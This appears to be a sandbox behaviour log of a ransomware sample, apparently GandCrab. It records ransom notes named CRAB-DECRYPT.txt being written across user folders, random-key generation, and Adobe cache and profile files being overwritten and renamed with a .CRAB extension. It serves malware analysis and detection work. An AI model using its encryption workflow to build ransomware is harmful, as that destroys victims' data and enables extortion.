| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Local\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Roaming\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\Application Data\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\Application Data\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\Application Data\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\Cookies\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\Desktop\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\Documents\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\Documents\My Music\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\Documents\My Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\Documents\My Videos\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\Downloads\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\Favorites\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\Links\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\Music\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\My Documents\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\My Documents\My Music\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\My Documents\My Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\My Documents\My Videos\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\NetHood\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\PrintHood\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\Recent\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\Saved Games\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\SendTo\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\Start Menu\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\Start Menu\Programs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\Start Menu\Programs\Accessibility\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\Start Menu\Programs\Accessories\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\Start Menu\Programs\Maintenance\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\Start Menu\Programs\System Tools\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\Start Menu\Programs\Windows PowerShell\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\Templates\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default User\Videos\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\ActiveSync\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\ActiveSync\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt15.lst, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt15.lst, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt15.lst, size = 1048576, size_out = 1035 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt15.lst, size = 1040 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt15.lst, size = 256 |
|
2 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt15.lst, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt15.lst, destination_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt15.lst.CRAB |
|
1 | |
| File | Get Info | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt15.lst, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt15.lst, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt15.lst, size = 1048576, size_out = 150488 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt15.lst, size = 150496 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt15.lst, size = 256 |
|
2 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt15.lst, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt15.lst, destination_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt15.lst.CRAB |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\Cache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\Cache\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt15.lst, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt15.lst, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt15.lst, size = 1048576, size_out = 9566 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt15.lst, size = 9568 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt15.lst, size = 256 |
|
2 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt15.lst, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt15.lst, destination_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt15.lst.CRAB |
|
1 | |
| File | Get Info | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr.dat, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr.dat, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr.dat, size = 1048576, size_out = 63152 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr.dat, size = 63152 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr.dat, size = 256 |
|
2 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr.dat, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr.dat, destination_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr.dat.CRAB |
|
1 | |
| File | Get Info | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\UserCache.bin, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\UserCache.bin, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\UserCache.bin, size = 1048576, size_out = 63413 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\UserCache.bin, size = 63424 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\UserCache.bin, size = 256 |
|
2 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\UserCache.bin, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\UserCache.bin, destination_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Acrobat\DC\UserCache.bin.CRAB |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\AcroCef\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\AcroCef\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\AcroCef\DC\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\AcroCef\DC\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\AcroCef\DC\Acrobat\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\AcroCef\DC\Acrobat\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cookie\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cookie\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\ACECache11.lst, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\ACECache11.lst, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\ACECache11.lst, size = 1048576, size_out = 1156 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\ACECache11.lst, size = 1168 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\ACECache11.lst, size = 256 |
|
2 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\ACECache11.lst, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\ACECache11.lst, destination_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\ACECache11.lst.CRAB |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\Profiles\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\Profiles\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\Profiles\wscRGB.icc, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\Profiles\wscRGB.icc, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\Profiles\wscRGB.icc, size = 1048576, size_out = 66208 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\Profiles\wscRGB.icc, size = 66208 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\Profiles\wscRGB.icc, size = 256 |
|
2 | |
| File | Write | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\Profiles\wscRGB.icc, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\Profiles\wscRGB.icc, destination_filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\Profiles\wscRGB.icc.CRAB |
|
1 | |
| File | Get Info | filename = C:\Documents and Settings\Nd9E1FYi\AppData\Local\Adobe\Color\Profiles\wsRGB.icc, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
